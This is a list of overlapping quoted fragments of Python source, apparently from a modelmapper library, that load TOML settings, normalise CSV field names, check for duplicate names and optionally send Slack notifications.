"in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get passed in value from",
"conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_')",
"might have new lines in the field names. \" \"Please fix that and",
"_verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i: v for i, v in",
"x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions",
"i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get passed in",
"if item not in self.settings: self.settings[item] = [] try: first_value = self.settings[item][0] except",
"v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get passed in value",
"if duplicates: raise ValueError(f'The following fields were repeated in the csv: {duplicates}') def",
"else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]]",
"new lines in the field names. \" \"Please fix that and try again.\")",
"'_') item = camel_to_snake(item) for source, to_replace in conv: item = item.replace(source, to_replace)",
"fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path,",
"slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier)",
"try: field_name = clean_names[i] except IndexError: raise ValueError(\"Your data might have new lines",
"repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it)",
"self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path',",
"self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item == source: item = to_replace",
"{} for name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field",
"name def _does_line_include_data(self, line): # whether line has any characters in it that",
"such as \\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n',",
"item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n',",
"slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH",
"passed in value from ENV VAR, defaulting to passed in value if not",
"return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list or nested lists \"\"\" if",
"import namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack",
"self.settings['slack_http_endpoint'] # attempt to get passed in value from ENV VAR, defaulting to",
"ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else:",
"be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end",
"path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning",
"in counter.most_common(10) if v > 1} if duplicates: raise ValueError(f'The following fields were",
"in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return",
"to end with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later =",
"None: raise ValueError('setup_path needs to be passed to init or SETUP_PATH needs to",
"x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {}",
"ast import literal_eval from copy import deepcopy from collections import defaultdict from collections",
"csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader)",
"result def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return",
"clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary for line",
"_does_line_include_data(self, line): # whether line has any characters in it that are not",
"import deepcopy from collections import defaultdict from collections import namedtuple, Counter from modelmapper.misc",
"self.settings.field_name_full_conversion: if item == source: item = to_replace break return item def _get_all_clean_field_names_mapping(self,",
"_get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item ==",
"else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): # whether line has any characters",
"else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text): if",
"'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path needs to be passed to",
"attribute.') if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end with _setup.toml') self.debug",
"self.settings = deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item]",
"for item in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] =",
"def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack(",
"Since we cleaning up the field_name_part_conversion, special characters # such as \\n need",
"isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for",
"for source, to_replace in conv: item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self,",
"slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml',",
"not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names):",
"from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger",
"source: item = to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {}",
"> 1} if duplicates: raise ValueError(f'The following fields were repeated in the csv:",
"from copy import deepcopy from collections import defaultdict from collections import namedtuple, Counter",
"in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False)",
"break return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in names:",
"init or SETUP_PATH needs to be a class attribute.') if not self.setup_path.endswith('_setup.toml'): raise",
"import literal_eval from copy import deepcopy from collections import defaultdict from collections import",
"turning into dictionary for line in reader: if self._does_line_include_data(line): for i, v in",
"a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name",
"if not self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end with _setup.toml') self.debug =",
"name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def",
"self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] =",
"in clean_names_mapping: raise ValueError(f\"'{name}' field has a collision with '{clean_names_mapping[clean_name]}'. \" f\"They both",
"= debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed']",
"import importlib from ast import literal_eval from copy import deepcopy from collections import",
"self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint'] #",
"def _clean_settings_items(self, item): \"\"\" Normalizes list or nested lists \"\"\" if item not",
"slack_http_endpoint = self.settings['slack_http_endpoint'] # attempt to get passed in value from ENV VAR,",
"[])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v",
"collections import defaultdict from collections import namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml,",
"_clean_settings_items(self, item): \"\"\" Normalizes list or nested lists \"\"\" if item not in",
"ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter =",
"self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name'] = COMBINED_FILE_NAME.format(identifier) self.settings['booleans']",
"= os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the field_name_part_conversion, special characters #",
"in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter",
"key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for",
"v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings', '",
"path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names)",
"importlib from ast import literal_eval from copy import deepcopy from collections import defaultdict",
"debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set",
"slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack( text,",
"# Since we cleaning up the field_name_part_conversion, special characters # such as \\n",
"in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names",
"\"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH = None def",
"'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings =",
"to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list or nested lists \"\"\"",
"are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) - self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self,",
"= dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings)",
"were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names,",
"return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping",
"item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list or",
"in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys()))",
"= [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item]))",
"line in reader: if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name =",
"= deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item] =",
"identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names = next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values())",
"self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it,",
"def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i: v for i, v",
"set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i):",
"Base: logger = logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None, debug=False): self.setup_path =",
"text): if self.settings.slack_username and \\ self.settings.slack_channel and \\ self.settings.slack_http_endpoint: return slack( text, username=self.settings.slack_username,",
"= load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for item in",
"self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '')",
"= self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name",
"(self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item =",
"COMBINED_FILE_NAME.format(identifier) self.settings['booleans'] = self.settings['boolean_true'] | self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in",
"duplicates = {i: v for i, v in counter.most_common(10) if v > 1}",
"i, v in counter.most_common(10) if v > 1} if duplicates: raise ValueError(f'The following",
"Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME =",
"= Counter(names) duplicates = {i: v for i, v in counter.most_common(10) if v",
"self.settings[item] = [] try: first_value = self.settings[item][0] except IndexError: pass else: if isinstance(first_value,",
"from ENV VAR, defaulting to passed in value if not present slack_http_endpoint =",
"self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings = namedtuple('Settings', ' '.join(self.settings.keys())) self.settings",
"logger = logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path",
"os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier =",
"get passed in value from ENV VAR, defaulting to passed in value if",
"if item == source: item = to_replace break return item def _get_all_clean_field_names_mapping(self, names):",
"((i, int(v)) for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1]))",
"or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path needs to be",
"import sys import logging import importlib from ast import literal_eval from copy import",
"item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list or nested lists \"\"\" if item",
"= name def _does_line_include_data(self, line): # whether line has any characters in it",
"clean_names_mapping[clean_name] = name def _does_line_include_data(self, line): # whether line has any characters in",
"self.setup_path.endswith('_setup.toml'): raise ValueError('The path needs to end with _setup.toml') self.debug = debug self.setup_dir",
"for i, j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name):",
"v in counter.most_common(10) if v > 1} if duplicates: raise ValueError(f'The following fields",
"\" \"Please fix that and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed:",
"name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping: raise ValueError(f\"'{name}' field has a",
"self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if",
"= \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None,",
"set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item",
"IndexError: pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j",
"= self.settings['slack_http_endpoint'] # attempt to get passed in value from ENV VAR, defaulting",
"self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier = os.path.basename(self.setup_path).replace('_setup.toml', '') self.settings['overrides_file_name'] = OVERRIDES_FILE_NAME.format(identifier) self.settings['combined_file_name']",
"== source: item = to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping =",
"'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item)",
"from collections import namedtuple, Counter from modelmapper.misc import read_csv_gen, load_toml, camel_to_snake from modelmapper.slack",
"= next(reader) self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader",
"# whether line has any characters in it that are not in ignore_lines_that_include_only_subset_of",
"else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for source,",
"with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation',",
"convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}'",
"in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return result def slack(self, text): if self.settings.slack_username and \\ self.settings.slack_channel",
"self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path',",
"'{clean_names_mapping[clean_name]}'. \" f\"They both produce '{clean_name}'\") else: clean_names_mapping[clean_name] = name def _does_line_include_data(self, line):",
"self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i, int(v)) for i, v in",
"in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or",
"None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if",
"j in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item =",
"fix that and try again.\") else: if field_name not in self.settings.fields_to_be_scrubbed: result[field_name].append(v) return",
"= {} for name in names: name_mapping[name] = self._get_clean_field_name(name) return name_mapping def _get_combined_module(self):",
"- self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i: v",
"characters in it that are not in ignore_lines_that_include_only_subset_of return any(filter(lambda x: set(x.strip()) -",
"self.setup_path is None: raise ValueError('setup_path needs to be passed to init or SETUP_PATH",
"in value from ENV VAR, defaulting to passed in value if not present",
"= [] try: first_value = self.settings[item][0] except IndexError: pass else: if isinstance(first_value, list):",
"ValueError('setup_path needs to be passed to init or SETUP_PATH needs to be a",
"item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in conv: item =",
"= os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] = self.settings.get('should_reprocess', False) self.settings['slack_http_endpoint'] = slack_http_endpoint self.settings['identifier'] = identifier",
"to_replace in self.settings.field_name_full_conversion: if item == source: item = to_replace break return item",
"nested lists \"\"\" if item not in self.settings: self.settings[item] = [] try: first_value",
"to be added seperately. # self.settings['field_name_part_conversion'].insert(0, ['\\n', '_']).insert(0, ['\\r\\n', '_']) _max_int = ((i,",
"in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since",
"names. \" \"Please fix that and try again.\") else: if field_name not in",
"in self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name)",
"conv: item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list",
"'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings",
"__init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is",
"= namedtuple('Settings', ' '.join(self.settings.keys())) self.settings = Settings(**self.settings) self.questionable_fields = {} self.solid_decisions = {}",
"ValueError('The path needs to end with _setup.toml') self.debug = debug self.setup_dir = os.path.dirname(self.setup_path)",
"item == source: item = to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping",
"data might have new lines in the field names. \" \"Please fix that",
"item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in names: name_mapping[name] =",
"_clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n',",
"\"\"\" if item not in self.settings: self.settings[item] = [] try: first_value = self.settings[item][0]",
"logging.getLogger(__name__) SETUP_PATH = None def __init__(self, setup_path=None, debug=False): self.setup_path = setup_path or getattr(self,",
"= self._get_clean_field_name(name) return name_mapping def _get_combined_module(self): combined_module_str = self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self,",
"self.settings[item]] else: self.settings[item] = list(map(self._clean_it, self.settings[item])) def _get_clean_field_name(self, name): item = self._clean_it(name) for",
"'boolean_true', 'boolean_false', 'datetime_formats', 'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for",
"to init or SETUP_PATH needs to be a class attribute.') if not self.setup_path.endswith('_setup.toml'):",
"= (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict) else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item",
"i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'), ('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v])",
"line): # whether line has any characters in it that are not in",
"'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later: self._clean_settings_items(item) for",
"os import sys import logging import importlib from ast import literal_eval from copy",
"value from ENV VAR, defaulting to passed in value if not present slack_http_endpoint",
"the field_name_part_conversion, special characters # such as \\n need to be added seperately.",
"return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path)",
"r'{}' self.settings[key] = {self._clean_it(i): v for i, v in literal_eval(self.settings[key]).items()} slack_http_endpoint = self.settings['slack_http_endpoint']",
"clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) #",
"COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH = None def __init__(self,",
"item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item == source: item",
"to passed in value if not present slack_http_endpoint = os.environ.get(slack_http_endpoint, slack_http_endpoint) self.settings['should_reprocess'] =",
"setup_path or getattr(self, 'SETUP_PATH', None) if self.setup_path is None: raise ValueError('setup_path needs to",
"cleaning up the field_name_part_conversion, special characters # such as \\n need to be",
"v for i, v in counter.most_common(10) if v > 1} if duplicates: raise",
"self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the field_name_part_conversion, special characters",
"return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in names: name_mapping[name]",
"# attempt to get passed in value from ENV VAR, defaulting to passed",
"self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into dictionary for line in reader: if",
"from ast import literal_eval from copy import deepcopy from collections import defaultdict from",
"for item in clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item, []))",
"self.settings.combined_file_name[:-3] return importlib.import_module(combined_module_str) def _verify_no_duplicate_clean_names(self, names_mapping): clean_names_mapping = {} for name, clean_name in",
"item = to_replace break return item def _get_all_clean_field_names_mapping(self, names): name_mapping = {} for",
"self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error' self.settings[key]",
"set() self.empty_fields = set() def _clean_it(self, item): conv = (self.settings['field_name_part_conversion'] if isinstance(self.settings, dict)",
"Counter(names) duplicates = {i: v for i, v in counter.most_common(10) if v >",
"clean_names[i] except IndexError: raise ValueError(\"Your data might have new lines in the field",
"self.settings.ignore_lines_that_include_only_subset_of, line)) def _verify_no_duplicate_names(self, names): counter = Counter(names) duplicates = {i: v for",
"_get_all_clean_field_names_mapping(self, names): name_mapping = {} for name in names: name_mapping[name] = self._get_clean_field_name(name) return",
"| self.settings['boolean_false'] self.settings['datetime_allowed_characters'] = set(self.settings['datetime_allowed_characters']) for i, v in (('overrides_path', 'overrides_file_name'), ('combined_path', 'combined_file_name'),",
"clean_later: self._clean_settings_items(item) for item in convert_to_set: self.settings[item] = set(self.settings.get(item, [])) key = 'default_value_for_field_when_casting_error'",
"in conv: item = item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes",
"counter = Counter(names) duplicates = {i: v for i, v in counter.most_common(10) if",
"def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv",
"special characters # such as \\n need to be added seperately. # self.settings['field_name_part_conversion'].insert(0,",
"item = item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in conv:",
"= item.replace(source, to_replace) return item.strip('_') def _clean_settings_items(self, item): \"\"\" Normalizes list or nested",
"os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the field_name_part_conversion, special characters # such",
"else self.settings.field_name_part_conversion) item = item.replace('\\r\\n', '_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace",
"the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader = read_csv_gen(path, identify_header_by_column_names=self.settings.identify_header_by_column_names, cleaning_func=self._clean_it) names =",
"self._verify_no_duplicate_names(names) name_mapping = self._get_all_clean_field_names_mapping(names) self._verify_no_duplicate_clean_names(name_mapping) clean_names = list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self,",
"result = defaultdict(list) clean_names, reader = self._get_clean_names_and_csv_data_gen(path) # transposing csv and turning into",
"'_').replace('\\n', '_') item = camel_to_snake(item) for source, to_replace in conv: item = item.replace(source,",
"('output_model_path', 'output_model_file')): self.settings[i] = os.path.join(self.setup_dir, self.settings[v]) # Since we cleaning up the field_name_part_conversion,",
"names_mapping): clean_names_mapping = {} for name, clean_name in names_mapping.items(): if clean_name in clean_names_mapping:",
"following fields were repeated in the csv: {duplicates}') def _get_clean_names_and_csv_data_gen(self, path): reader =",
"os.path.dirname(self.setup_path) sys.path.append(self.setup_dir) clean_later = ['field_name_full_conversion', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names', 'fields_to_be_encrypted', 'fields_to_be_scrubbed'] convert_to_set = ['null_values', 'boolean_true',",
"item not in self.settings: self.settings[item] = [] try: first_value = self.settings[item][0] except IndexError:",
"name): item = self._clean_it(name) for source, to_replace in self.settings.field_name_full_conversion: if item == source:",
"= \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__) SETUP_PATH = None",
"= 'default_value_for_field_when_casting_error' self.settings[key] = self.settings.get(key) or r'{}' self.settings[key] = {self._clean_it(i): v for i,",
"= self.settings[item][0] except IndexError: pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)]",
"camel_to_snake from modelmapper.slack import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base:",
"in the field names. \" \"Please fix that and try again.\") else: if",
"'ignore_lines_that_include_only_subset_of', 'ignore_fields_in_signature_calculation', 'identify_header_by_column_names'] self._original_settings = load_toml(self.setup_path)['settings'] self.settings = deepcopy(self._original_settings) for item in clean_later:",
"for i, v in self.settings['max_int'].items()) self.settings['max_int'] = dict(sorted(_max_int, key=lambda x: x[1])) Settings =",
"pass else: if isinstance(first_value, list): self.settings[item] = [[self._clean_it(i), self._clean_it(j)] for i, j in",
"= list(name_mapping.values()) return clean_names, reader def _get_all_values_per_clean_name(self, path): result = defaultdict(list) clean_names, reader",
"into dictionary for line in reader: if self._does_line_include_data(line): for i, v in enumerate(line):",
"for line in reader: if self._does_line_include_data(line): for i, v in enumerate(line): try: field_name",
"import slack OVERRIDES_FILE_NAME = \"{}_overrides.toml\" COMBINED_FILE_NAME = \"{}_combined.py\" class Base: logger = logging.getLogger(__name__)",
"is None: raise ValueError('setup_path needs to be passed to init or SETUP_PATH needs",
